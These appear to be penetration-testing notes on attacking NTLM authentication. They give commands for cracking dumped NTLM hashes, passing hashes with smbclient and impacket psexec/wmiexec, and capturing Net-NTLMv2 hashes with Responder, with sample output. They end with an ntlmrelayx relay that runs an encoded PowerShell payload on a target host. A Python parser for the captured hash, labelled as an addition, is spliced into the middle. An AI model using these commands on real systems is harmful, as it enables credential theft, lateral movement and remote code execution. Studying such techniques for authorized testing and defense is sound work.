NTLM and Net-NTLMv2
NTLM
NTLM hashes are typically retrieved after compromising a Windows host, elevating to SYSTEM, and using a tool such as Mimikatz to dump the SAM file.
hashcat -m 1000 myhackingblog.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
If the hash can't be cracked, it can still be passed (pass-the-hash).
smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b [email protected]
impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b [email protected]
NTLMv2
Net-NTLMv2 hashes are typically retrieved via Responder.
kali@kali:~$ sudo responder -I eth0
(Responder ASCII-art banner)
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
...
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
...
[+] Listening for events...
[SMB] NTLMv2-SSP Client : ::ffff:192.168.13.37
[SMB] NTLMv2-SSP Username : ADMIN01\james
[SMB] NTLMv2-SSP Hash : james::ADMIN01:1f9d4c51f6e74653:795F138EC69C274D0FD53BB32908A72B:010100000000000000B050CD1777D801B7585DF5719ACFBA0000000002000800360057004D00520001001E00570049004E002D00340044004E004800550058004300340054004900430004003400570049004E002D00340044004E0048005500580043003400540049004300
hashcat -m 5600 james.hash /usr/share/wordlists/rockyou.txt --force
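As an added example (not part of the original notes, and not Responder's or hashcat's code), the following Python script parses the captured line above into the fields hashcat mode 5600 consumes: username, domain, the 8-byte server challenge, the 16-byte NTProofStr, and the NTLMv2_CLIENT_CHALLENGE blob. Inside the blob are the timestamp, the client challenge and the AV_PAIR list (field names follow MS-NLMP), which record the client computer and domain names. The captured line is embedded as constructed input, truncated exactly as the page shows it, so the parser also demonstrates handling an incomplete final AV_PAIR. For a defender reviewing such a capture, the blob says which client machine authenticated and when, which is what you need to correlate with that host's logs.

```python
import struct
from datetime import datetime, timedelta, timezone

# Constructed input: the line Responder printed above, copied verbatim and
# split for readability. The page truncates the blob, so the last AV_PAIR
# (MsvAvDnsDomainName, declared 52 bytes) is incomplete.
CAPTURED_LINE = (
    "james::ADMIN01:1f9d4c51f6e74653:795F138EC69C274D0FD53BB32908A72B:"
    "010100000000000000B050CD1777D801B7585DF5719ACFBA00000000"
    "02000800360057004D005200"
    "01001E00570049004E002D00340044004E0048005500580043003400540049004300"
    "04003400570049004E002D00340044004E0048005500580043003400540049004300"
)

# AvId values from MS-NLMP 2.2.2.1 (AV_PAIR)
AV_IDS = {
    0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
    6: "MsvAvFlags", 7: "MsvAvTimestamp", 8: "MsvAvSingleHost",
    9: "MsvAvTargetName", 10: "MsvAvChannelBindings",
}
UTF16_IDS = {1, 2, 3, 4, 5, 9}  # AV_PAIR values that are UTF-16LE strings


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_av_pairs(data: bytes):
    """Walk the AV_PAIR list; returns (pairs, reached_EOL)."""
    pairs, off, complete = [], 0, False
    while off + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, off)
        off += 4
        if av_id == 0:                      # MsvAvEOL terminates the list
            complete = True
            break
        value = data[off:off + av_len]      # may be short if the blob was cut
        off += av_len
        name = AV_IDS.get(av_id, f"MsvAvUnknown{av_id}")
        if av_id in UTF16_IDS:
            text = value.decode("utf-16-le", errors="replace")
        elif av_id == 7 and len(value) == 8:
            text = filetime_to_datetime(struct.unpack("<Q", value)[0]).isoformat()
        else:
            text = value.hex()
        if len(value) < av_len:
            text += " [truncated]"
        pairs.append((name, text))
    return pairs, complete


def parse_net_ntlmv2(line: str) -> dict:
    """Split a hashcat 5600 / Responder line: user::domain:serverchal:NTProofStr:blob."""
    user, _unused, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":", 5)
    blob = bytes.fromhex(blob_hex)
    # NTLMv2_CLIENT_CHALLENGE header: RespType, HiRespType, 6 reserved bytes,
    # TimeStamp (8), ChallengeFromClient (8), 4 reserved bytes, then AV_PAIRs.
    if len(blob) < 28 or blob[0] != 1 or blob[1] != 1:
        raise ValueError("not an NTLMv2_CLIENT_CHALLENGE blob")
    (filetime,) = struct.unpack_from("<Q", blob, 8)
    av_pairs, complete = parse_av_pairs(blob[28:])
    return {
        "user": user,
        "domain": domain,
        "server_challenge": server_challenge.lower(),
        "nt_proof_str": nt_proof.lower(),
        "filetime": filetime,
        "timestamp": filetime_to_datetime(filetime).isoformat(),
        "client_challenge": blob[16:24].hex(),
        "av_pairs": av_pairs,
        "blob_complete": complete,
    }


if __name__ == "__main__":
    for key, val in parse_net_ntlmv2(CAPTURED_LINE).items():
        print(f"{key}: {val}")
```

Because the response is bound to a per-session server challenge, client challenge and timestamp, a captured Net-NTLMv2 line can only be brute-forced offline against candidate passwords (mode 5600) or relayed while the session is live; unlike an NT hash it cannot be passed. The parser flags `blob_complete` as false here because the page's copy of the line never reaches the MsvAvEOL pair.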
Not all hashes can be cracked, but luckily it's still possible to relay them. If you don't have a specific target in mind, provide a list of hosts instead. ntlmrelayx sets up its own SMB server, so it does not need to be run in conjunction with Responder.
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.13.38 -c "powershell -enc JABjAGwAa..."